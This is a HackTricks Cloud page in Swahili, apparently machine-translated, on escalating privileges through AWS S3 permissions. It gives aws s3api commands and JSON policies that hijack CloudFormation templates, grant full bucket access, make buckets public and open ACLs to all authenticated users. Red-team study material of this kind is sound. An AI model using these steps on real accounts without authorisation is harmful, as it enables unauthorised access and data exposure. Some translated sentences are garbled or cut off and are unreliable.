AWS - S3 Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

S3

`s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject`

Mshambuliaji mwenye ruhusa hizo juu ya mifuko ya kuvutia anaweza kuwa na uwezo wa kuiba rasilimali na kupandisha mamlaka.

Kwa mfano, mshambuliaji mwenye ruhusa hizo juu ya mfuko wa cloudformation unaoitwa "cf-templates-nohnwfax6a6i-us-east-1" ataweza kuiba uanzishaji. Ufikiaji unaweza kutolewa kwa sera ifuatayo:

{
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Action":[
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"],
"Resource":[
"arn:aws:s3:::cf-templates-*\/*",
"arn:aws:s3:::cf-templates-*"]
},
{
"Effect":"Allow",
"Action":"s3:ListAllMyBuckets",
"Resource":"*"
}]
}

Na hijack inapatikana kwa sababu kuna dirisha dogo la muda kutoka wakati template inapoupoaded kwenye bucket hadi wakati template inatekelezwa. Mshambuliaji anaweza tu kuunda lambda function katika akaunti yake ambayo itakuwa inachochewa wakati arifa ya bucket inatumwa, na hijacks maudhui ya bucket hiyo.

Moduli ya Pacu cfn__resouce_injection inaweza kutumika kuendesha shambulio hili. Kwa maelezo zaidi angalia utafiti wa asili: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/

`s3:PutObject`, `s3:GetObject`

Hizi ni ruhusa za kupata na kupakia vitu kwenye S3. Huduma kadhaa ndani ya AWS (na nje yake) hutumia hifadhi ya S3 kuhifadhi faili za usanidi. Mshambuliaji mwenye ufikiaji wa kusoma kwao anaweza kupata taarifa nyeti juu yao. Mshambuliaji mwenye ufikiaji wa kuandika kwao anaweza kubadilisha data ili kutumia huduma fulani na kujaribu kupandisha mamlaka. Hizi ni baadhi ya mifano:

Ikiwa mfano wa EC2 unahifadhi data za mtumiaji kwenye bucket ya S3, mshambuliaji anaweza kuibadilisha ili kutekeleza msimbo wa kiholela ndani ya mfano wa EC2.

`s3:PutBucketPolicy`

Mshambuliaji, ambaye anahitaji kuwa kutoka kwenye akaunti hiyo hiyo, ikiwa sivyo kosa Njia iliyoainishwa hairuhusiwi itasababisha, kwa ruhusa hii ataweza kujipa ruhusa zaidi juu ya bucket(s) akimruhusu kusoma, kuandika, kubadilisha, kufuta na kufichua buckets.

# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}

`s3:GetBucketAcl`, `s3:PutBucketAcl`

Mshambuliaji anaweza kutumia ruhusa hizi kumpatia ufikiaji zaidi juu ya makundi maalum. Kumbuka kwamba mshambuliaji hatahitaji kuwa kutoka kwenye akaunti ile ile. Zaidi ya hayo, ufikiaji wa kuandika

# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

`s3:GetObjectAcl`, `s3:PutObjectAcl`

Mshambuliaji anaweza kutumia ruhusa hizi ili kumpatia ufikiaji zaidi juu ya vitu maalum ndani ya ndoo.

# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

`s3:GetObjectAcl`, `s3:PutObjectVersionAcl`

Mshambuliaji mwenye haki hizi anatarajiwa kuwa na uwezo wa kuweka Acl kwa toleo maalum la kitu.

aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json